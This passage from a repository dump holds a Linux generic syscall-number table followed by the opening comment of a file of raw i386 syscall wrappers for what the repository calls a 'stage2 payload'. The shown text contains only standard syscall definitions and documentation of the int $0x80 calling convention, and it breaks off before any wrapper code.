246 | 247 | /* fs/sync.c */ 248 | #define __NR_sync 81 249 | __SYSCALL(__NR_sync, sys_sync) 250 | #define __NR_fsync 82 251 | __SYSCALL(__NR_fsync, sys_fsync) 252 | #define __NR_fdatasync 83 253 | __SYSCALL(__NR_fdatasync, sys_fdatasync) 254 | #ifdef __ARCH_WANT_SYNC_FILE_RANGE2 255 | #define __NR_sync_file_range2 84 256 | __SC_COMP(__NR_sync_file_range2, sys_sync_file_range2, \ 257 | compat_sys_sync_file_range2) 258 | #else 259 | #define __NR_sync_file_range 84 260 | __SC_COMP(__NR_sync_file_range, sys_sync_file_range, \ 261 | compat_sys_sync_file_range) 262 | #endif 263 | 264 | /* fs/timerfd.c */ 265 | #define __NR_timerfd_create 85 266 | __SYSCALL(__NR_timerfd_create, sys_timerfd_create) 267 | #define __NR_timerfd_settime 86 268 | __SC_COMP(__NR_timerfd_settime, sys_timerfd_settime, \ 269 | compat_sys_timerfd_settime) 270 | #define __NR_timerfd_gettime 87 271 | __SC_COMP(__NR_timerfd_gettime, sys_timerfd_gettime, \ 272 | compat_sys_timerfd_gettime) 273 | 274 | /* fs/utimes.c */ 275 | #define __NR_utimensat 88 276 | __SC_COMP(__NR_utimensat, sys_utimensat, compat_sys_utimensat) 277 | 
278 | /* kernel/acct.c */ 279 | #define __NR_acct 89 280 | __SYSCALL(__NR_acct, sys_acct) 281 | 282 | /* kernel/capability.c */ 283 | #define __NR_capget 90 284 | __SYSCALL(__NR_capget, sys_capget) 285 | #define __NR_capset 91 286 | __SYSCALL(__NR_capset, sys_capset) 287 | 288 | /* kernel/exec_domain.c */ 289 | #define __NR_personality 92 290 | __SYSCALL(__NR_personality, sys_personality) 291 | 292 | /* kernel/exit.c */ 293 | #define __NR_exit 93 294 | __SYSCALL(__NR_exit, sys_exit) 295 | #define __NR_exit_group 94 296 | __SYSCALL(__NR_exit_group, sys_exit_group) 297 | #define __NR_waitid 95 298 | __SC_COMP(__NR_waitid, sys_waitid, compat_sys_waitid) 299 | 300 | /* kernel/fork.c */ 301 | #define __NR_set_tid_address 96 302 | __SYSCALL(__NR_set_tid_address, sys_set_tid_address) 303 | #define __NR_unshare 97 304 | __SYSCALL(__NR_unshare, sys_unshare) 305 | 306 | /* kernel/futex.c */ 307 | #define __NR_futex 98 308 | __SC_COMP(__NR_futex, sys_futex, compat_sys_futex) 309 | #define __NR_set_robust_list 99 310 | __SC_COMP(__NR_set_robust_list, sys_set_robust_list, \ 311 | compat_sys_set_robust_list) 312 | #define __NR_get_robust_list 100 313 | __SC_COMP(__NR_get_robust_list, sys_get_robust_list, \ 314 | compat_sys_get_robust_list) 315 | 316 | /* kernel/hrtimer.c */ 317 | #define __NR_nanosleep 101 318 | __SC_COMP(__NR_nanosleep, sys_nanosleep, compat_sys_nanosleep) 319 | 320 | /* kernel/itimer.c */ 321 | #define __NR_getitimer 102 322 | __SC_COMP(__NR_getitimer, sys_getitimer, compat_sys_getitimer) 323 | #define __NR_setitimer 103 324 | __SC_COMP(__NR_setitimer, sys_setitimer, compat_sys_setitimer) 325 | 326 | /* kernel/kexec.c */ 327 | #define __NR_kexec_load 104 328 | __SC_COMP(__NR_kexec_load, sys_kexec_load, compat_sys_kexec_load) 329 | 330 | /* kernel/module.c */ 331 | #define __NR_init_module 105 332 | __SYSCALL(__NR_init_module, sys_init_module) 333 | #define __NR_delete_module 106 334 | __SYSCALL(__NR_delete_module, sys_delete_module) 335 | 336 | /* 
kernel/posix-timers.c */ 337 | #define __NR_timer_create 107 338 | __SC_COMP(__NR_timer_create, sys_timer_create, compat_sys_timer_create) 339 | #define __NR_timer_gettime 108 340 | __SC_COMP(__NR_timer_gettime, sys_timer_gettime, compat_sys_timer_gettime) 341 | #define __NR_timer_getoverrun 109 342 | __SYSCALL(__NR_timer_getoverrun, sys_timer_getoverrun) 343 | #define __NR_timer_settime 110 344 | __SC_COMP(__NR_timer_settime, sys_timer_settime, compat_sys_timer_settime) 345 | #define __NR_timer_delete 111 346 | __SYSCALL(__NR_timer_delete, sys_timer_delete) 347 | #define __NR_clock_settime 112 348 | __SC_COMP(__NR_clock_settime, sys_clock_settime, compat_sys_clock_settime) 349 | #define __NR_clock_gettime 113 350 | __SC_COMP(__NR_clock_gettime, sys_clock_gettime, compat_sys_clock_gettime) 351 | #define __NR_clock_getres 114 352 | __SC_COMP(__NR_clock_getres, sys_clock_getres, compat_sys_clock_getres) 353 | #define __NR_clock_nanosleep 115 354 | __SC_COMP(__NR_clock_nanosleep, sys_clock_nanosleep, \ 355 | compat_sys_clock_nanosleep) 356 | 357 | /* kernel/printk.c */ 358 | #define __NR_syslog 116 359 | __SYSCALL(__NR_syslog, sys_syslog) 360 | 361 | /* kernel/ptrace.c */ 362 | #define __NR_ptrace 117 363 | __SYSCALL(__NR_ptrace, sys_ptrace) 364 | 365 | /* kernel/sched/core.c */ 366 | #define __NR_sched_setparam 118 367 | __SYSCALL(__NR_sched_setparam, sys_sched_setparam) 368 | #define __NR_sched_setscheduler 119 369 | __SYSCALL(__NR_sched_setscheduler, sys_sched_setscheduler) 370 | #define __NR_sched_getscheduler 120 371 | __SYSCALL(__NR_sched_getscheduler, sys_sched_getscheduler) 372 | #define __NR_sched_getparam 121 373 | __SYSCALL(__NR_sched_getparam, sys_sched_getparam) 374 | #define __NR_sched_setaffinity 122 375 | __SC_COMP(__NR_sched_setaffinity, sys_sched_setaffinity, \ 376 | compat_sys_sched_setaffinity) 377 | #define __NR_sched_getaffinity 123 378 | __SC_COMP(__NR_sched_getaffinity, sys_sched_getaffinity, \ 379 | compat_sys_sched_getaffinity) 380 | #define 
__NR_sched_yield 124 381 | __SYSCALL(__NR_sched_yield, sys_sched_yield) 382 | #define __NR_sched_get_priority_max 125 383 | __SYSCALL(__NR_sched_get_priority_max, sys_sched_get_priority_max) 384 | #define __NR_sched_get_priority_min 126 385 | __SYSCALL(__NR_sched_get_priority_min, sys_sched_get_priority_min) 386 | #define __NR_sched_rr_get_interval 127 387 | __SC_COMP(__NR_sched_rr_get_interval, sys_sched_rr_get_interval, \ 388 | compat_sys_sched_rr_get_interval) 389 | 390 | /* kernel/signal.c */ 391 | #define __NR_restart_syscall 128 392 | __SYSCALL(__NR_restart_syscall, sys_restart_syscall) 393 | #define __NR_kill 129 394 | __SYSCALL(__NR_kill, sys_kill) 395 | #define __NR_tkill 130 396 | __SYSCALL(__NR_tkill, sys_tkill) 397 | #define __NR_tgkill 131 398 | __SYSCALL(__NR_tgkill, sys_tgkill) 399 | #define __NR_sigaltstack 132 400 | __SC_COMP(__NR_sigaltstack, sys_sigaltstack, compat_sys_sigaltstack) 401 | #define __NR_rt_sigsuspend 133 402 | __SC_COMP(__NR_rt_sigsuspend, sys_rt_sigsuspend, compat_sys_rt_sigsuspend) 403 | #define __NR_rt_sigaction 134 404 | __SC_COMP(__NR_rt_sigaction, sys_rt_sigaction, compat_sys_rt_sigaction) 405 | #define __NR_rt_sigprocmask 135 406 | __SC_COMP(__NR_rt_sigprocmask, sys_rt_sigprocmask, compat_sys_rt_sigprocmask) 407 | #define __NR_rt_sigpending 136 408 | __SC_COMP(__NR_rt_sigpending, sys_rt_sigpending, compat_sys_rt_sigpending) 409 | #define __NR_rt_sigtimedwait 137 410 | __SC_COMP(__NR_rt_sigtimedwait, sys_rt_sigtimedwait, \ 411 | compat_sys_rt_sigtimedwait) 412 | #define __NR_rt_sigqueueinfo 138 413 | __SC_COMP(__NR_rt_sigqueueinfo, sys_rt_sigqueueinfo, \ 414 | compat_sys_rt_sigqueueinfo) 415 | #define __NR_rt_sigreturn 139 416 | __SC_COMP(__NR_rt_sigreturn, sys_rt_sigreturn, compat_sys_rt_sigreturn) 417 | 418 | /* kernel/sys.c */ 419 | #define __NR_setpriority 140 420 | __SYSCALL(__NR_setpriority, sys_setpriority) 421 | #define __NR_getpriority 141 422 | __SYSCALL(__NR_getpriority, sys_getpriority) 423 | #define __NR_reboot 
142 424 | __SYSCALL(__NR_reboot, sys_reboot) 425 | #define __NR_setregid 143 426 | __SYSCALL(__NR_setregid, sys_setregid) 427 | #define __NR_setgid 144 428 | __SYSCALL(__NR_setgid, sys_setgid) 429 | #define __NR_setreuid 145 430 | __SYSCALL(__NR_setreuid, sys_setreuid) 431 | #define __NR_setuid 146 432 | __SYSCALL(__NR_setuid, sys_setuid) 433 | #define __NR_setresuid 147 434 | __SYSCALL(__NR_setresuid, sys_setresuid) 435 | #define __NR_getresuid 148 436 | __SYSCALL(__NR_getresuid, sys_getresuid) 437 | #define __NR_setresgid 149 438 | __SYSCALL(__NR_setresgid, sys_setresgid) 439 | #define __NR_getresgid 150 440 | __SYSCALL(__NR_getresgid, sys_getresgid) 441 | #define __NR_setfsuid 151 442 | __SYSCALL(__NR_setfsuid, sys_setfsuid) 443 | #define __NR_setfsgid 152 444 | __SYSCALL(__NR_setfsgid, sys_setfsgid) 445 | #define __NR_times 153 446 | __SC_COMP(__NR_times, sys_times, compat_sys_times) 447 | #define __NR_setpgid 154 448 | __SYSCALL(__NR_setpgid, sys_setpgid) 449 | #define __NR_getpgid 155 450 | __SYSCALL(__NR_getpgid, sys_getpgid) 451 | #define __NR_getsid 156 452 | __SYSCALL(__NR_getsid, sys_getsid) 453 | #define __NR_setsid 157 454 | __SYSCALL(__NR_setsid, sys_setsid) 455 | #define __NR_getgroups 158 456 | __SYSCALL(__NR_getgroups, sys_getgroups) 457 | #define __NR_setgroups 159 458 | __SYSCALL(__NR_setgroups, sys_setgroups) 459 | #define __NR_uname 160 460 | __SYSCALL(__NR_uname, sys_newuname) 461 | #define __NR_sethostname 161 462 | __SYSCALL(__NR_sethostname, sys_sethostname) 463 | #define __NR_setdomainname 162 464 | __SYSCALL(__NR_setdomainname, sys_setdomainname) 465 | #define __NR_getrlimit 163 466 | __SC_COMP(__NR_getrlimit, sys_getrlimit, compat_sys_getrlimit) 467 | #define __NR_setrlimit 164 468 | __SC_COMP(__NR_setrlimit, sys_setrlimit, compat_sys_setrlimit) 469 | #define __NR_getrusage 165 470 | __SC_COMP(__NR_getrusage, sys_getrusage, compat_sys_getrusage) 471 | #define __NR_umask 166 472 | __SYSCALL(__NR_umask, sys_umask) 473 | #define __NR_prctl 
167 474 | __SYSCALL(__NR_prctl, sys_prctl) 475 | #define __NR_getcpu 168 476 | __SYSCALL(__NR_getcpu, sys_getcpu) 477 | 478 | /* kernel/time.c */ 479 | #define __NR_gettimeofday 169 480 | __SC_COMP(__NR_gettimeofday, sys_gettimeofday, compat_sys_gettimeofday) 481 | #define __NR_settimeofday 170 482 | __SC_COMP(__NR_settimeofday, sys_settimeofday, compat_sys_settimeofday) 483 | #define __NR_adjtimex 171 484 | __SC_COMP(__NR_adjtimex, sys_adjtimex, compat_sys_adjtimex) 485 | 486 | /* kernel/timer.c */ 487 | #define __NR_getpid 172 488 | __SYSCALL(__NR_getpid, sys_getpid) 489 | #define __NR_getppid 173 490 | __SYSCALL(__NR_getppid, sys_getppid) 491 | #define __NR_getuid 174 492 | __SYSCALL(__NR_getuid, sys_getuid) 493 | #define __NR_geteuid 175 494 | __SYSCALL(__NR_geteuid, sys_geteuid) 495 | #define __NR_getgid 176 496 | __SYSCALL(__NR_getgid, sys_getgid) 497 | #define __NR_getegid 177 498 | __SYSCALL(__NR_getegid, sys_getegid) 499 | #define __NR_gettid 178 500 | __SYSCALL(__NR_gettid, sys_gettid) 501 | #define __NR_sysinfo 179 502 | __SC_COMP(__NR_sysinfo, sys_sysinfo, compat_sys_sysinfo) 503 | 504 | /* ipc/mqueue.c */ 505 | #define __NR_mq_open 180 506 | __SC_COMP(__NR_mq_open, sys_mq_open, compat_sys_mq_open) 507 | #define __NR_mq_unlink 181 508 | __SYSCALL(__NR_mq_unlink, sys_mq_unlink) 509 | #define __NR_mq_timedsend 182 510 | __SC_COMP(__NR_mq_timedsend, sys_mq_timedsend, compat_sys_mq_timedsend) 511 | #define __NR_mq_timedreceive 183 512 | __SC_COMP(__NR_mq_timedreceive, sys_mq_timedreceive, \ 513 | compat_sys_mq_timedreceive) 514 | #define __NR_mq_notify 184 515 | __SC_COMP(__NR_mq_notify, sys_mq_notify, compat_sys_mq_notify) 516 | #define __NR_mq_getsetattr 185 517 | __SC_COMP(__NR_mq_getsetattr, sys_mq_getsetattr, compat_sys_mq_getsetattr) 518 | 519 | /* ipc/msg.c */ 520 | #define __NR_msgget 186 521 | __SYSCALL(__NR_msgget, sys_msgget) 522 | #define __NR_msgctl 187 523 | __SC_COMP(__NR_msgctl, sys_msgctl, compat_sys_msgctl) 524 | #define __NR_msgrcv 188 
525 | __SC_COMP(__NR_msgrcv, sys_msgrcv, compat_sys_msgrcv) 526 | #define __NR_msgsnd 189 527 | __SC_COMP(__NR_msgsnd, sys_msgsnd, compat_sys_msgsnd) 528 | 529 | /* ipc/sem.c */ 530 | #define __NR_semget 190 531 | __SYSCALL(__NR_semget, sys_semget) 532 | #define __NR_semctl 191 533 | __SC_COMP(__NR_semctl, sys_semctl, compat_sys_semctl) 534 | #define __NR_semtimedop 192 535 | __SC_COMP(__NR_semtimedop, sys_semtimedop, compat_sys_semtimedop) 536 | #define __NR_semop 193 537 | __SYSCALL(__NR_semop, sys_semop) 538 | 539 | /* ipc/shm.c */ 540 | #define __NR_shmget 194 541 | __SYSCALL(__NR_shmget, sys_shmget) 542 | #define __NR_shmctl 195 543 | __SC_COMP(__NR_shmctl, sys_shmctl, compat_sys_shmctl) 544 | #define __NR_shmat 196 545 | __SC_COMP(__NR_shmat, sys_shmat, compat_sys_shmat) 546 | #define __NR_shmdt 197 547 | __SYSCALL(__NR_shmdt, sys_shmdt) 548 | 549 | /* net/socket.c */ 550 | #define __NR_socket 198 551 | __SYSCALL(__NR_socket, sys_socket) 552 | #define __NR_socketpair 199 553 | __SYSCALL(__NR_socketpair, sys_socketpair) 554 | #define __NR_bind 200 555 | __SYSCALL(__NR_bind, sys_bind) 556 | #define __NR_listen 201 557 | __SYSCALL(__NR_listen, sys_listen) 558 | #define __NR_accept 202 559 | __SYSCALL(__NR_accept, sys_accept) 560 | #define __NR_connect 203 561 | __SYSCALL(__NR_connect, sys_connect) 562 | #define __NR_getsockname 204 563 | __SYSCALL(__NR_getsockname, sys_getsockname) 564 | #define __NR_getpeername 205 565 | __SYSCALL(__NR_getpeername, sys_getpeername) 566 | #define __NR_sendto 206 567 | __SYSCALL(__NR_sendto, sys_sendto) 568 | #define __NR_recvfrom 207 569 | __SC_COMP(__NR_recvfrom, sys_recvfrom, compat_sys_recvfrom) 570 | #define __NR_setsockopt 208 571 | __SC_COMP(__NR_setsockopt, sys_setsockopt, compat_sys_setsockopt) 572 | #define __NR_getsockopt 209 573 | __SC_COMP(__NR_getsockopt, sys_getsockopt, compat_sys_getsockopt) 574 | #define __NR_shutdown 210 575 | __SYSCALL(__NR_shutdown, sys_shutdown) 576 | #define __NR_sendmsg 211 577 | 
__SC_COMP(__NR_sendmsg, sys_sendmsg, compat_sys_sendmsg) 578 | #define __NR_recvmsg 212 579 | __SC_COMP(__NR_recvmsg, sys_recvmsg, compat_sys_recvmsg) 580 | 581 | /* mm/filemap.c */ 582 | #define __NR_readahead 213 583 | __SC_COMP(__NR_readahead, sys_readahead, compat_sys_readahead) 584 | 585 | /* mm/nommu.c, also with MMU */ 586 | #define __NR_brk 214 587 | __SYSCALL(__NR_brk, sys_brk) 588 | #define __NR_munmap 215 589 | __SYSCALL(__NR_munmap, sys_munmap) 590 | #define __NR_mremap 216 591 | __SYSCALL(__NR_mremap, sys_mremap) 592 | 593 | /* security/keys/keyctl.c */ 594 | #define __NR_add_key 217 595 | __SYSCALL(__NR_add_key, sys_add_key) 596 | #define __NR_request_key 218 597 | __SYSCALL(__NR_request_key, sys_request_key) 598 | #define __NR_keyctl 219 599 | __SC_COMP(__NR_keyctl, sys_keyctl, compat_sys_keyctl) 600 | 601 | /* arch/example/kernel/sys_example.c */ 602 | #define __NR_clone 220 603 | __SYSCALL(__NR_clone, sys_clone) 604 | #define __NR_execve 221 605 | __SC_COMP(__NR_execve, sys_execve, compat_sys_execve) 606 | 607 | #define __NR3264_mmap 222 608 | __SC_3264(__NR3264_mmap, sys_mmap2, sys_mmap) 609 | /* mm/fadvise.c */ 610 | #define __NR3264_fadvise64 223 611 | __SC_COMP(__NR3264_fadvise64, sys_fadvise64_64, compat_sys_fadvise64_64) 612 | 613 | /* mm/, CONFIG_MMU only */ 614 | #ifndef __ARCH_NOMMU 615 | #define __NR_swapon 224 616 | __SYSCALL(__NR_swapon, sys_swapon) 617 | #define __NR_swapoff 225 618 | __SYSCALL(__NR_swapoff, sys_swapoff) 619 | #define __NR_mprotect 226 620 | __SYSCALL(__NR_mprotect, sys_mprotect) 621 | #define __NR_msync 227 622 | __SYSCALL(__NR_msync, sys_msync) 623 | #define __NR_mlock 228 624 | __SYSCALL(__NR_mlock, sys_mlock) 625 | #define __NR_munlock 229 626 | __SYSCALL(__NR_munlock, sys_munlock) 627 | #define __NR_mlockall 230 628 | __SYSCALL(__NR_mlockall, sys_mlockall) 629 | #define __NR_munlockall 231 630 | __SYSCALL(__NR_munlockall, sys_munlockall) 631 | #define __NR_mincore 232 632 | __SYSCALL(__NR_mincore, sys_mincore) 633 
| #define __NR_madvise 233 634 | __SYSCALL(__NR_madvise, sys_madvise) 635 | #define __NR_remap_file_pages 234 636 | __SYSCALL(__NR_remap_file_pages, sys_remap_file_pages) 637 | #define __NR_mbind 235 638 | __SC_COMP(__NR_mbind, sys_mbind, compat_sys_mbind) 639 | #define __NR_get_mempolicy 236 640 | __SC_COMP(__NR_get_mempolicy, sys_get_mempolicy, compat_sys_get_mempolicy) 641 | #define __NR_set_mempolicy 237 642 | __SC_COMP(__NR_set_mempolicy, sys_set_mempolicy, compat_sys_set_mempolicy) 643 | #define __NR_migrate_pages 238 644 | __SC_COMP(__NR_migrate_pages, sys_migrate_pages, compat_sys_migrate_pages) 645 | #define __NR_move_pages 239 646 | __SC_COMP(__NR_move_pages, sys_move_pages, compat_sys_move_pages) 647 | #endif 648 | 649 | #define __NR_rt_tgsigqueueinfo 240 650 | __SC_COMP(__NR_rt_tgsigqueueinfo, sys_rt_tgsigqueueinfo, \ 651 | compat_sys_rt_tgsigqueueinfo) 652 | #define __NR_perf_event_open 241 653 | __SYSCALL(__NR_perf_event_open, sys_perf_event_open) 654 | #define __NR_accept4 242 655 | __SYSCALL(__NR_accept4, sys_accept4) 656 | #define __NR_recvmmsg 243 657 | __SC_COMP(__NR_recvmmsg, sys_recvmmsg, compat_sys_recvmmsg) 658 | 659 | /* 660 | * Architectures may provide up to 16 syscalls of their own 661 | * starting with this value. 
662 | */ 663 | #define __NR_arch_specific_syscall 244 664 | 665 | #define __NR_wait4 260 666 | __SC_COMP(__NR_wait4, sys_wait4, compat_sys_wait4) 667 | #define __NR_prlimit64 261 668 | __SYSCALL(__NR_prlimit64, sys_prlimit64) 669 | #define __NR_fanotify_init 262 670 | __SYSCALL(__NR_fanotify_init, sys_fanotify_init) 671 | #define __NR_fanotify_mark 263 672 | __SYSCALL(__NR_fanotify_mark, sys_fanotify_mark) 673 | #define __NR_name_to_handle_at 264 674 | __SYSCALL(__NR_name_to_handle_at, sys_name_to_handle_at) 675 | #define __NR_open_by_handle_at 265 676 | __SC_COMP(__NR_open_by_handle_at, sys_open_by_handle_at, \ 677 | compat_sys_open_by_handle_at) 678 | #define __NR_clock_adjtime 266 679 | __SC_COMP(__NR_clock_adjtime, sys_clock_adjtime, compat_sys_clock_adjtime) 680 | #define __NR_syncfs 267 681 | __SYSCALL(__NR_syncfs, sys_syncfs) 682 | #define __NR_setns 268 683 | __SYSCALL(__NR_setns, sys_setns) 684 | #define __NR_sendmmsg 269 685 | __SC_COMP(__NR_sendmmsg, sys_sendmmsg, compat_sys_sendmmsg) 686 | #define __NR_process_vm_readv 270 687 | __SC_COMP(__NR_process_vm_readv, sys_process_vm_readv, \ 688 | compat_sys_process_vm_readv) 689 | #define __NR_process_vm_writev 271 690 | __SC_COMP(__NR_process_vm_writev, sys_process_vm_writev, \ 691 | compat_sys_process_vm_writev) 692 | #define __NR_kcmp 272 693 | __SYSCALL(__NR_kcmp, sys_kcmp) 694 | #define __NR_finit_module 273 695 | __SYSCALL(__NR_finit_module, sys_finit_module) 696 | #define __NR_sched_setattr 274 697 | __SYSCALL(__NR_sched_setattr, sys_sched_setattr) 698 | #define __NR_sched_getattr 275 699 | __SYSCALL(__NR_sched_getattr, sys_sched_getattr) 700 | #define __NR_renameat2 276 701 | __SYSCALL(__NR_renameat2, sys_renameat2) 702 | __SYSCALL(277, sys_ni_syscall) 703 | __SYSCALL(278, sys_ni_syscall) 704 | #define __NR_memfd_create 279 705 | __SYSCALL(__NR_memfd_create, sys_memfd_create) 706 | 707 | #undef __NR_syscalls 708 | #define __NR_syscalls 280 709 | 710 | /* 711 | * All syscalls below here should go away 
really, 712 | * these are provided for both review and as a porting 713 | * help for the C library version. 714 | * 715 | * Last chance: are any of these important enough to 716 | * enable by default? 717 | */ 718 | #define __ARCH_WANT_SYSCALL_NO_AT 719 | 720 | #ifdef __ARCH_WANT_SYSCALL_NO_AT 721 | #define __NR_open 1024 722 | __SYSCALL(__NR_open, sys_open) 723 | #define __NR_link 1025 724 | __SYSCALL(__NR_link, sys_link) 725 | #define __NR_unlink 1026 726 | __SYSCALL(__NR_unlink, sys_unlink) 727 | #define __NR_mknod 1027 728 | __SYSCALL(__NR_mknod, sys_mknod) 729 | #define __NR_chmod 1028 730 | __SYSCALL(__NR_chmod, sys_chmod) 731 | #define __NR_chown 1029 732 | __SYSCALL(__NR_chown, sys_chown) 733 | #define __NR_mkdir 1030 734 | __SYSCALL(__NR_mkdir, sys_mkdir) 735 | #define __NR_rmdir 1031 736 | __SYSCALL(__NR_rmdir, sys_rmdir) 737 | #define __NR_lchown 1032 738 | __SYSCALL(__NR_lchown, sys_lchown) 739 | #define __NR_access 1033 740 | __SYSCALL(__NR_access, sys_access) 741 | #define __NR_rename 1034 742 | __SYSCALL(__NR_rename, sys_rename) 743 | #define __NR_readlink 1035 744 | __SYSCALL(__NR_readlink, sys_readlink) 745 | #define __NR_symlink 1036 746 | __SYSCALL(__NR_symlink, sys_symlink) 747 | #define __NR_utimes 1037 748 | __SYSCALL(__NR_utimes, sys_utimes) 749 | #define __NR3264_stat 1038 750 | __SC_3264(__NR3264_stat, sys_stat64, sys_newstat) 751 | #define __NR3264_lstat 1039 752 | __SC_3264(__NR3264_lstat, sys_lstat64, sys_newlstat) 753 | 754 | #undef __NR_syscalls 755 | #define __NR_syscalls (__NR3264_lstat+1) 756 | #endif /* __ARCH_WANT_SYSCALL_NO_AT */ 757 | 758 | #ifdef __ARCH_WANT_SYSCALL_NO_FLAGS 759 | #define __NR_pipe 1040 760 | __SYSCALL(__NR_pipe, sys_pipe) 761 | #define __NR_dup2 1041 762 | __SYSCALL(__NR_dup2, sys_dup2) 763 | #define __NR_epoll_create 1042 764 | __SYSCALL(__NR_epoll_create, sys_epoll_create) 765 | #define __NR_inotify_init 1043 766 | __SYSCALL(__NR_inotify_init, sys_inotify_init) 767 | #define __NR_eventfd 1044 768 | 
__SYSCALL(__NR_eventfd, sys_eventfd) 769 | #define __NR_signalfd 1045 770 | __SYSCALL(__NR_signalfd, sys_signalfd) 771 | 772 | #undef __NR_syscalls 773 | #define __NR_syscalls (__NR_signalfd+1) 774 | #endif /* __ARCH_WANT_SYSCALL_NO_FLAGS */ 775 | 776 | #if (__BITS_PER_LONG == 32 || defined(__SYSCALL_COMPAT)) && \ 777 | defined(__ARCH_WANT_SYSCALL_OFF_T) 778 | #define __NR_sendfile 1046 779 | __SYSCALL(__NR_sendfile, sys_sendfile) 780 | #define __NR_ftruncate 1047 781 | __SYSCALL(__NR_ftruncate, sys_ftruncate) 782 | #define __NR_truncate 1048 783 | __SYSCALL(__NR_truncate, sys_truncate) 784 | #define __NR_stat 1049 785 | __SYSCALL(__NR_stat, sys_newstat) 786 | #define __NR_lstat 1050 787 | __SYSCALL(__NR_lstat, sys_newlstat) 788 | #define __NR_fstat 1051 789 | __SYSCALL(__NR_fstat, sys_newfstat) 790 | #define __NR_fcntl 1052 791 | __SYSCALL(__NR_fcntl, sys_fcntl) 792 | #define __NR_fadvise64 1053 793 | #define __ARCH_WANT_SYS_FADVISE64 794 | __SYSCALL(__NR_fadvise64, sys_fadvise64) 795 | #define __NR_newfstatat 1054 796 | #define __ARCH_WANT_SYS_NEWFSTATAT 797 | __SYSCALL(__NR_newfstatat, sys_newfstatat) 798 | #define __NR_fstatfs 1055 799 | __SYSCALL(__NR_fstatfs, sys_fstatfs) 800 | #define __NR_statfs 1056 801 | __SYSCALL(__NR_statfs, sys_statfs) 802 | #define __NR_lseek 1057 803 | __SYSCALL(__NR_lseek, sys_lseek) 804 | #define __NR_mmap 1058 805 | __SYSCALL(__NR_mmap, sys_mmap) 806 | 807 | #undef __NR_syscalls 808 | #define __NR_syscalls (__NR_mmap+1) 809 | #endif /* 32 bit off_t syscalls */ 810 | 811 | #ifdef __ARCH_WANT_SYSCALL_DEPRECATED 812 | #define __NR_alarm 1059 813 | #define __ARCH_WANT_SYS_ALARM 814 | __SYSCALL(__NR_alarm, sys_alarm) 815 | #define __NR_getpgrp 1060 816 | #define __ARCH_WANT_SYS_GETPGRP 817 | __SYSCALL(__NR_getpgrp, sys_getpgrp) 818 | #define __NR_pause 1061 819 | #define __ARCH_WANT_SYS_PAUSE 820 | __SYSCALL(__NR_pause, sys_pause) 821 | #define __NR_time 1062 822 | #define __ARCH_WANT_SYS_TIME 823 | #define __ARCH_WANT_COMPAT_SYS_TIME 
824 | __SYSCALL(__NR_time, sys_time) 825 | #define __NR_utime 1063 826 | #define __ARCH_WANT_SYS_UTIME 827 | __SYSCALL(__NR_utime, sys_utime) 828 | 829 | #define __NR_creat 1064 830 | __SYSCALL(__NR_creat, sys_creat) 831 | #define __NR_getdents 1065 832 | #define __ARCH_WANT_SYS_GETDENTS 833 | __SYSCALL(__NR_getdents, sys_getdents) 834 | #define __NR_futimesat 1066 835 | __SYSCALL(__NR_futimesat, sys_futimesat) 836 | #define __NR_select 1067 837 | #define __ARCH_WANT_SYS_SELECT 838 | __SYSCALL(__NR_select, sys_select) 839 | #define __NR_poll 1068 840 | __SYSCALL(__NR_poll, sys_poll) 841 | #define __NR_epoll_wait 1069 842 | __SYSCALL(__NR_epoll_wait, sys_epoll_wait) 843 | #define __NR_ustat 1070 844 | __SYSCALL(__NR_ustat, sys_ustat) 845 | #define __NR_vfork 1071 846 | __SYSCALL(__NR_vfork, sys_vfork) 847 | #define __NR_oldwait4 1072 848 | __SYSCALL(__NR_oldwait4, sys_wait4) 849 | #define __NR_recv 1073 850 | __SYSCALL(__NR_recv, sys_recv) 851 | #define __NR_send 1074 852 | __SYSCALL(__NR_send, sys_send) 853 | #define __NR_bdflush 1075 854 | __SYSCALL(__NR_bdflush, sys_bdflush) 855 | #define __NR_umount 1076 856 | __SYSCALL(__NR_umount, sys_oldumount) 857 | #define __ARCH_WANT_SYS_OLDUMOUNT 858 | #define __NR_uselib 1077 859 | __SYSCALL(__NR_uselib, sys_uselib) 860 | #define __NR__sysctl 1078 861 | __SYSCALL(__NR__sysctl, sys_sysctl) 862 | 863 | #define __NR_fork 1079 864 | #ifdef CONFIG_MMU 865 | __SYSCALL(__NR_fork, sys_fork) 866 | #else 867 | __SYSCALL(__NR_fork, sys_ni_syscall) 868 | #endif /* CONFIG_MMU */ 869 | 870 | #undef __NR_syscalls 871 | #define __NR_syscalls (__NR_fork+1) 872 | 873 | #endif /* __ARCH_WANT_SYSCALL_DEPRECATED */ 874 | 875 | /* 876 | * 32 bit systems traditionally used different 877 | * syscalls for off_t and loff_t arguments, while 878 | * 64 bit systems only need the off_t version. 879 | * For new 32 bit platforms, there is no need to 880 | * implement the old 32 bit off_t syscalls, so 881 | * they take different names. 
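* Here we map the numbers so that both versions
* use the same syscall table layout.
*/
#if __BITS_PER_LONG == 64 && !defined(__SYSCALL_COMPAT)
#define __NR_fcntl __NR3264_fcntl
#define __NR_statfs __NR3264_statfs
#define __NR_fstatfs __NR3264_fstatfs
#define __NR_truncate __NR3264_truncate
#define __NR_ftruncate __NR3264_ftruncate
#define __NR_lseek __NR3264_lseek
#define __NR_sendfile __NR3264_sendfile
#define __NR_newfstatat __NR3264_fstatat
#define __NR_fstat __NR3264_fstat
#define __NR_mmap __NR3264_mmap
#define __NR_fadvise64 __NR3264_fadvise64
#ifdef __NR3264_stat
#define __NR_stat __NR3264_stat
#define __NR_lstat __NR3264_lstat
#endif
#else
#define __NR_fcntl64 __NR3264_fcntl
#define __NR_statfs64 __NR3264_statfs
#define __NR_fstatfs64 __NR3264_fstatfs
#define __NR_truncate64 __NR3264_truncate
#define __NR_ftruncate64 __NR3264_ftruncate
#define __NR_llseek __NR3264_lseek
#define __NR_sendfile64 __NR3264_sendfile
#define __NR_fstatat64 __NR3264_fstatat
#define __NR_fstat64 __NR3264_fstat
#define __NR_mmap2 __NR3264_mmap
#define __NR_fadvise64_64 __NR3264_fadvise64
#ifdef __NR3264_stat
#define __NR_stat64 __NR3264_stat
#define __NR_lstat64 __NR3264_lstat
#endif
#endif
--------------------------------------------------------------------------------
/stage2/syscall_x86.c:
--------------------------------------------------------------------------------
#include "syscall_x86.h"
#include "linuxdefs.h"

/*
 * Raw Linux/i386 syscall wrappers for the stage2 payload (freestanding,
 * no libc).
 *
 * Convention used by every wrapper in this file: syscall number in eax,
 * arguments in ebx, ecx, edx, "int $0x80" traps into the kernel, and the
 * raw kernel result comes back in eax: >= 0 on success, -errno on failure
 * (there is no errno variable in this environment, callers test the sign).
 *
 * Review notes on the asm statements:
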